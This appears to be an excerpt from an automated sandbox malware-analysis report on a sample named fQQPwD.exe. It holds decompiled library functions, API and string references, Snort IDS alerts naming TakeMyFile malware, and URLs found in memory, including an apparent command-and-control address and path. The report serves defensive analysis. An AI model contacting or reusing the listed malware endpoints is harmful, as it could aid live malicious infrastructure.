				_t29 = __ecx + 4;
				__imp__TryAcquireSRWLockExclusive(_t29);
				if(_t21 == 0) {
					_t21 = L000A8CF0(_t29, _t29, _t44, __eflags, __fp0);
				}
				_v200 = _t29;
				_t30 =  *((intOrPtr*)(_t45 + 0x14));
				if(_t30 != 0) {
					_v204 =  *((intOrPtr*)( *_t30 + 0x20));
					 *0x137000();
					_t21 = _v204(_t47);
				}
				_t31 =  *((intOrPtr*)(_t45 + 0x18));
				_t46 =  *((intOrPtr*)(_t45 + 0x1c));
				while(_t31 != _t46) {
					_t21 = L000B7F30(_t21,  *_t31, _t47);
					_t31 = _t31 + 4;
				}
				__imp__ReleaseSRWLockExclusive();
				_t48 =  &_v200;
				L000C1CA0(_t21,  &_v200);
				E000DE643(E00070790(L000C1D20( &_v200, _t44, _t60, "tracing/main_trace_log", _a8)), _t31, _v40 ^ _t49, _t44, _t46, _t48, _v200);
				return 1;
			}

0x000ac6c0
0x000ac6c0
0x000ac6cf
0x000ac6d1
0x000ac6d8
0x000ac6df
0x000ac6e3
0x000ac6ec
0x000ac6f5
0x000ac6fe
0x000ac704
0x000ac70a
0x000ac710
0x000ac716
0x000ac71c
0x000ac722
0x000ac728
0x000ac733
0x000ac73e
0x000ac744
0x000ac752
0x000ac757
0x000ac75b
0x000ac763
0x000ac7e6
0x000ac7e6
0x000ac765
0x000ac769
0x000ac76e
0x000ac775
0x000ac779
0x000ac782
0x000ac782
0x000ac786
0x000ac789
0x000ac78e
0x000ac793
0x000ac798
0x000ac79b
0x000ac7a3
0x000ac7a9
0x000ac7af
0x000ac7d3
0x000ac7e1

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,00000000,00000200), ref: 000AC75B
ReleaseSRWLockExclusive.KERNEL32(?), ref: 000AC7A3

Strings

tracing/main_trace_log, xrefs: 000AC7B9

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: tracing/main_trace_log
API String ID: 17069307-566173763
Opcode ID: 0ab75decb467b033c14f18280b2c80dc4052a54205b06dd38f65be4665a7639e
Instruction ID: 3e32c3e74c0a8cad51272933473f7ee572cae0392df07126ab050b17848f3795
Opcode Fuzzy Hash: 0ab75decb467b033c14f18280b2c80dc4052a54205b06dd38f65be4665a7639e
Instruction Fuzzy Hash: 5831B071A187819BD7209F64C881BAEF3A1FFCA320F10472DF4D546682DBB09944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 000A0460 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E000A0460(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _v16;
				signed int _v24;
				char _v96;
				char _v616;
				char _v622;
				short _v624;
				char _v636;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t23;
				WCHAR* _t29;
				signed int _t30;
				void* _t40;
				void* _t43;
				signed int _t44;
				signed int _t45;
				void* _t49;
				void* _t52;

				_t56 = __fp0;
				_t52 = __eflags;
				_t40 = __edx;
				_t13 =  *0x120014; // 0xf049169a
				_v24 = _t13 ^ _t44;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x250], xmm0");
				asm("movdqa [esp+0x240], xmm0");
				asm("movdqa [esp+0x230], xmm0");
				asm("movdqa [esp+0x220], xmm0");
				_t29 =  &_v616;
				L000A4C80(_t29, "GetCurrentDirectoryW", "..\\..\\base\\files\\file_util_win.cc", 0x45b);
				L000A9DD0(_t29,  &_v96, _t40, _t52, __fp0, _t29, 0);
				E000E11A0(_t41,  &_v622, 0xff, 0x206);
				_t49 = (_t45 & 0xfffffff0) - 0x270 + 0x1c;
				_v624 = 0;
				_t43 = GetCurrentDirectoryW(0x104, _t29) + 0xfffffefb;
				_t53 = _t43 - 0xfffffefc;
				if(_t43 >= 0xfffffefc) {
					_t23 = E000F33D4(_t29);
					_t41 = _t49 + 4;
					L0009A860(_t29, _t49 + 4, _t49 + 4, _t43, _t53, __fp0, _t29, _t23);
					_t29 =  &_v636;
					E0009B6D0(_t29, _t41, _t40, _t41, __fp0, _t29);
					L0009A900(L0009A900(L0009A980(_a4, _t29), _t29), _t41);
				}
				_t30 = _t29 & 0xffffff00 | _t43 - 0xfffffefc >= 0x00000000;
				E000DE643(L000A9E30( &_v96, _t40, _t56), _t30, _v24 ^ _t44, _t40, _t41, _t43);
				return _t30;
			}

0x000a0460
0x000a0460
0x000a0460
0x000a046f
0x000a0476
0x000a047d
0x000a0481
0x000a048a
0x000a0493
0x000a049c
0x000a04a5
0x000a04b9
0x000a04cb
0x000a04df
0x000a04e4
0x000a04e7
0x000a04fc
0x000a0502
0x000a0508
0x000a050b
0x000a0513
0x000a0519
0x000a051e
0x000a0525
0x000a053c
0x000a053c
0x000a0547
0x000a055f
0x000a056d

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 000A04F4

Strings

GetCurrentDirectoryW, xrefs: 000A04B3
..\..\base\files\file_util_win.cc, xrefs: 000A04AE

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: CurrentDirectory
String ID: ..\..\base\files\file_util_win.cc$GetCurrentDirectoryW
API String ID: 1611563598-3514530069
Opcode ID: bc2c4c7768b8efaf5905767336a1d6ac010996c81e8a0653620d6da81c4673ac
Instruction ID: 237d997b689347ac474cd0f5ba022850f348610d0af70175d034d621d326afe1
Opcode Fuzzy Hash: bc2c4c7768b8efaf5905767336a1d6ac010996c81e8a0653620d6da81c4673ac
Instruction Fuzzy Hash: AB212972A5438467E620EB749CC6AEFB358AFC9360F10062DF9D6571C3EF74564482D2

Uniqueness

Uniqueness Score: -1.00%

Function 000BD754 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E000BD754(void* __ecx, intOrPtr* _a12) {
				void* _v16;
				signed int _v28;
				void* _t20;
				intOrPtr* _t27;
				intOrPtr* _t30;
				void* _t31;
				signed int _t33;
				intOrPtr _t35;
				signed int _t38;
				void* _t40;
				signed int _t42;
				intOrPtr _t49;

				_t31 = __ecx;
				_t27 = _a12;
				asm("movsd xmm0, [ebp+0x8]");
				asm("movsd [esp], xmm0");
				_t33 =  *((_t42 & 0xfffffff8) - 0x10);
				_t38 = _v28;
				if((_t38 & 0x7fffffff ^ 0x7ff00000 | _t33) != 0) {
					_t20 = 0;
					if((0x7ff00000 &  !_t38) == 0 && (_t33 | _t38 & 0x000fffff) != 0) {
						_t11 = _t31 + 8; // 0x0
						_t37 =  *_t11;
						if( *_t11 == 0) {
							goto L10;
						} else {
							_t40 = E000F31A0(_t37);
							_t32 = _a12;
							_t30 = _a12 + 8;
							goto L9;
						}
					}
				} else {
					_t3 = _t31 + 4; // 0x0
					_t37 =  *_t3;
					_t49 =  *_t3;
					if(_t49 == 0) {
						L10:
						_t20 = 0;
					} else {
						asm("xorpd xmm1, xmm1");
						asm("ucomisd xmm1, xmm0");
						if(_t49 > 0) {
							_t35 =  *((intOrPtr*)(_t27 + 8));
							 *((intOrPtr*)(_t27 + 8)) = _t35 + 1;
							 *((char*)( *_t27 + _t35)) = 0x2d;
							_t8 = _t31 + 4; // 0x0
							_t37 =  *_t8;
						}
						_t40 = E000F31A0(_t37);
						_t32 = _t27;
						_t30 = _t27 + 8;
						L9:
						L000E0C20( *_t32 +  *((intOrPtr*)(_t32 + 8)), _t37, _t40);
						 *_t30 =  *_t30 + _t40;
						_t20 = 1;
					}
				}
				return _t20;
			}

0x000bd754
0x000bd760
0x000bd763
0x000bd768
0x000bd76d
0x000bd770
0x000bd782
0x000bd7c2
0x000bd7c6
0x000bd7d2
0x000bd7d2
0x000bd7d7
0x00000000
0x000bd7d9
0x000bd7e2
0x000bd7e4
0x000bd7e7
0x00000000
0x000bd7e7
0x000bd7d7
0x000bd784
0x000bd784
0x000bd784
0x000bd787
0x000bd789
0x000bd800
0x000bd800
0x000bd78b
0x000bd78b
0x000bd78f
0x000bd793
0x000bd797
0x000bd79d
0x000bd7a0
0x000bd7a4
0x000bd7a4
0x000bd7a4
0x000bd7b0
0x000bd7b2
0x000bd7b4
0x000bd7ea
0x000bd7f2
0x000bd7fa
0x000bd7fc
0x000bd7fc
0x000bd789
0x000bd809

APIs

_strlen.LIBCMT ref: 000BD7A8
_strlen.LIBCMT ref: 000BD7DA

Strings

VWj, xrefs: 000BD7C8

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: _strlen
String ID: VWj
API String ID: 4218353326-3488467141
Opcode ID: b3692cf732bfad1cad2880caf07615d9b3b6f9655232f7f853f186846cec4823
Instruction ID: b1edd7f75fc166fb5ff9c36f18fa3d69ab0144a2ce85dd33cbe99eda20f090b0
Opcode Fuzzy Hash: b3692cf732bfad1cad2880caf07615d9b3b6f9655232f7f853f186846cec4823
Instruction Fuzzy Hash: 262108779002158BC711DE24CC81997B3A5AF96724B29836AE8185B342FB32EC06D7D1

Uniqueness

Uniqueness Score: -1.00%

Function 000CF1B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E000CF1B0(void** __ecx, void* __edx, void* __fp0) {
				void* _v16;
				signed int _v24;
				char _v104;
				char _v112;
				long _v128;
				char _v140;
				char _v144;
				char _v152;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t17;
				void* _t32;
				void** _t34;
				signed int _t35;
				signed int _t36;
				void* _t38;

				_t45 = __fp0;
				_t32 = __edx;
				_t38 = (_t36 & 0xfffffff0) - 0x90;
				_t34 = __ecx;
				_t15 =  *0x120014; // 0xf049169a
				_v24 = _t15 ^ _t35;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_v128 = 0xffffffff;
				_v144 = 0;
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x50], xmm0");
				asm("movdqa [esp+0x60], xmm0");
				asm("movdqa [esp+0x70], xmm0");
				_v112 = 0;
				_t33 =  &_v104;
				asm("pxor xmm0, xmm0");
				asm("movdqu [esp+0x38], xmm0");
				asm("movdqu [esp+0x48], xmm0");
				asm("movdqu [esp+0x58], xmm0");
				asm("movdqu [esp+0x68], xmm0");
				_t41 =  *((char*)(__ecx + 4));
				if( *((char*)(__ecx + 4)) != 0) {
					E000A66F0( &_v140,  &_v140,  &_v104, _t41, L000A4CB0(), __ecx);
					_v152 = 1;
					_t23 = _t38;
					L000A4C80(_t38, "Wait", "..\\..\\base\\synchronization\\waitable_event_win.cc", 0x42);
					L000A9E70(_t38,  &_v104, _t32, _t41, __fp0, _t23, 0);
					_v128 = 1;
				}
				_t17 = WaitForSingleObject( *_t34, 0xffffffff);
				if(_v112 != 0) {
					_t17 = L000A9E30(_t33, _t32, _t45);
				}
				if(_v144 != 0) {
					_t17 = E000A6220( &_v140, _t45);
				}
				return E000DE643(_t17, _t23, _v24 ^ _t35, _t32, _t33, _t34);
			}

0x000cf1b0
0x000cf1b0
0x000cf1b9
0x000cf1bf
0x000cf1c1
0x000cf1c8
0x000cf1cf
0x000cf1d3
0x000cf1d9
0x000cf1e1
0x000cf1e6
0x000cf1ec
0x000cf1f2
0x000cf1f8
0x000cf1fe
0x000cf204
0x000cf209
0x000cf20d
0x000cf211
0x000cf217
0x000cf21d
0x000cf223
0x000cf229
0x000cf22d
0x000cf23c
0x000cf241
0x000cf246
0x000cf255
0x000cf262
0x000cf267
0x000cf267
0x000cf270
0x000cf27b
0x000cf27f
0x000cf27f
0x000cf289
0x000cf28f
0x000cf28f
0x000cf2a9

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000CF270

Strings

..\..\base\synchronization\waitable_event_win.cc, xrefs: 000CF24A
Wait, xrefs: 000CF24F

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ObjectSingleWait
String ID: ..\..\base\synchronization\waitable_event_win.cc$Wait
API String ID: 24740636-2767331178
Opcode ID: 0eabf567f35e62ffacf773afb1a0f1ae2fa0568865e76846db23a454dc77804a
Instruction ID: f76d355fc3141f75f3e094b558952632b074f43e5d5cb0acbb5ab1ab2566ba88
Opcode Fuzzy Hash: 0eabf567f35e62ffacf773afb1a0f1ae2fa0568865e76846db23a454dc77804a
Instruction Fuzzy Hash: 5A21A071D183C166E320DB248886BABBBE4ABDA360F541B1DB4D0421D2DBE58588C393

Uniqueness

Uniqueness Score: -1.00%

Function 000B1720 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E000B1720(void** __ecx, void* __eflags, short* _a4, char* _a8) {
				signed int _v20;
				char _v24;
				char _v40;
				int _v44;
				int _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				intOrPtr _t28;
				void** _t38;
				long _t39;
				signed int _t40;

				_t38 = __ecx;
				_t18 =  *0x120014; // 0xf049169a
				_v20 = _t18 ^ _t40;
				_v44 = 4;
				_v48 = 4;
				_v52 = 0;
				_v24 = 0xff;
				_t28 =  *((intOrPtr*)(__ecx));
				_t37 =  &_v40;
				L000A4C80( &_v40, "ReadValue", "..\\..\\base\\win\\registry.cc", 0x1ad);
				L000C5A40( &_v24,  &_v40, _t28, 1);
				_t36 =  &_v44;
				_t39 = RegQueryValueExW( *_t38, _a4, 0,  &_v44,  &_v52,  &_v48);
				_t24 = E00070790(_t23);
				if(_t39 == 0) {
					_t24 = _v44 + 0xfffffffd;
					_t39 = 0x3f4;
					if(_v44 + 0xfffffffd <= 1 && _v48 == 4) {
						_t24 = _a8;
						 *_a8 = _v52;
						_t39 = 0;
					}
				}
				E000DE643(_t24, _t28, _v20 ^ _t40, _t36, _t37, _t39);
				return _t39;
			}

0x000b1729
0x000b172b
0x000b1732
0x000b1735
0x000b173c
0x000b1743
0x000b174a
0x000b174e
0x000b1750
0x000b1763
0x000b1772
0x000b177d
0x000b1790
0x000b1795
0x000b179c
0x000b17a1
0x000b17a4
0x000b17ac
0x000b17b4
0x000b17ba
0x000b17bc
0x000b17bc
0x000b17ac
0x000b17c3
0x000b17d1

APIs

RegQueryValueExW.ADVAPI32(FFFFFFFF,?,00000000,00000004,00000000,?,00000000,00000005,00000001), ref: 000B178A

Strings

ReadValue, xrefs: 000B175D
..\..\base\win\registry.cc, xrefs: 000B1758

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: QueryValue
String ID: ..\..\base\win\registry.cc$ReadValue
API String ID: 3660427363-2708835790
Opcode ID: 5f30e4a70a5c50a8f65f1156349430e4a86a246813d9ad0b1cb0be304c465a99
Instruction ID: beb84f5bef5dac113d6215fa865b96b3ec0327323a7054e1e4a7ee37185c0a52
Opcode Fuzzy Hash: 5f30e4a70a5c50a8f65f1156349430e4a86a246813d9ad0b1cb0be304c465a99
Instruction Fuzzy Hash: 00119A71E04218ABDB24DB98DC81FEEB7B8EB48724F004229F9117B281DB716D44CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 000A0570 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E000A0570(void* __eflags, void* __fp0, WCHAR* _a4) {
				void* _v16;
				signed int _v24;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				signed int _t17;
				signed int _t18;
				void* _t23;
				WCHAR* _t24;
				signed int _t26;
				signed int _t27;
				void* _t32;

				_t36 = __fp0;
				_t32 = __eflags;
				_t24 = _a4;
				_t9 =  *0x120014; // 0xf049169a
				_v24 = _t9 ^ _t26;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x20], xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_t17 = (_t27 & 0xfffffff0) - 0x60;
				L000A4C80(_t17, "SetCurrentDirectoryW", "..\\..\\base\\files\\file_util_win.cc", 0x46b);
				_t25 =  &_v96;
				L000A9DD0(_t17,  &_v96, _t23, _t32, __fp0, _t17, 0);
				if(_t24[5] < 0) {
					_t24 =  *_t24;
				}
				_t18 = _t17 & 0xffffff00 | SetCurrentDirectoryW(_t24) != 0x00000000;
				E000DE643(L000A9E30(_t25, _t23, _t36), _t18, _v24 ^ _t26, _t23, _t24, _t25);
				return _t18;
			}

0x000a0570
0x000a0570
0x000a057c
0x000a057f
0x000a0586
0x000a058a
0x000a058e
0x000a0594
0x000a059a
0x000a05a0
0x000a05a6
0x000a05b8
0x000a05c0
0x000a05c9
0x000a05d2
0x000a05d4
0x000a05d4
0x000a05df
0x000a05ef
0x000a05fd

APIs

SetCurrentDirectoryW.KERNEL32(?,?,00000000), ref: 000A05D7

Strings

SetCurrentDirectoryW, xrefs: 000A05B2
..\..\base\files\file_util_win.cc, xrefs: 000A05AD

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: CurrentDirectory
String ID: ..\..\base\files\file_util_win.cc$SetCurrentDirectoryW
API String ID: 1611563598-2135964009
Opcode ID: 29f7079caf3fb8589aaf959b8caf137890784db8e5fe370d0e41b32ff227972b
Instruction ID: ba321527b445aba38af3eecd3ae01069381865c267b837fd8e984eaf926c041d
Opcode Fuzzy Hash: 29f7079caf3fb8589aaf959b8caf137890784db8e5fe370d0e41b32ff227972b
Instruction Fuzzy Hash: 2E01F572B1438467D3009B64CC826ABF768EFCA760F10072EF9D053182FBB0A68482D2

Uniqueness

Uniqueness Score: -1.00%

Source: Traffic	Snort IDS: 2849814 ETPRO MALWARE TakeMyFile User-Agent 192.168.2.7:49713 -> 54.205.202.31:80
Source: Traffic	Snort IDS: 2849813 ETPRO MALWARE TakeMyFile Installer Checkin 192.168.2.7:49713 -> 54.205.202.31:80

Source: shi7C43.tmp.2.dr	String found in binary or memory: http://.css
Source: shi7C43.tmp.2.dr	String found in binary or memory: http://.jpg
Source: fQQPwD.exe, 00000010.00000002.508505822.00000000075D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.203.138
Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp, fQQPwD.exe, 00000010.00000002.508470443.00000000075CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.203.138.85
Source: fQQPwD.exe, 00000010.00000002.507141335.000000000734E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://20.203.138.85/megazord2023/index.php
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: DRTO10179793.msi, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr	String found in binary or memory: http://collect.installeranalytics.com
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: shi7C43.tmp.2.dr	String found in binary or memory: http://html4/loose.dtd
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: fQQPwD.exe, 00000010.00000002.506299472.0000000007211000.00000004.00000800.00020000.00000000.sdmp, fQQPwD.exe, 00000010.00000002.507141335.000000000734E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: fQQPwD.exe, 00000010.00000002.509928645.0000000009A1C000.00000020.00000001.01000000.00000005.sdmp, garurumon.bz2.2.dr	String found in binary or memory: http://stackoverflow.com/q/11564914;
Source: fQQPwD.exe, 00000010.00000002.509928645.0000000009A1C000.00000020.00000001.01000000.00000005.sdmp, garurumon.bz2.2.dr	String found in binary or memory: http://stackoverflow.com/q/2152978/23354
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://t2.symcb.com0
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://tl.symcd.com0&
Source: DRTO10179793.msi, MSI91B8.tmp.1.dr, 412f31.msi.1.dr, MSI9796.tmp.1.dr, MSI96CA.tmp.1.dr, MSI9F39.tmp.1.dr, MSI8958.tmp.1.dr, MSI8E3C.tmp.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: shi7C43.tmp.2.dr	String found in binary or memory: https://HTTP/1.1
